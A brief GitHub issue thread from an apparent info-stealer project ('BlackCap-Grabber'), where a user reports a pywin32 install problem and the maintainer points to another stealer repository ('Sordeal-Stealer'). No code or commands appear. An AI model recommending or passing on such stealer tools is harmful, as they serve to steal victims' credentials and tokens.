### ISSUE TITLE
You have to install pywin32

### ISSUE THREAD

**Issue by Retardcode** [Inplex-sys/BlackCap-Grabber-NoDualHook#29]
You have to install pywin32

_Originally posted by @Inplex-sys in https://github.com/Inplex-sys/BlackCap-Grabber-NoDualHook/issues/27#issuecomment-1511741147_
I had it installed when I posted that message so not sure

**Comment by Inplex-sys** [comment]
Use https://github.com/Inplex-sys/Sordeal-Stealer-NoDualHook
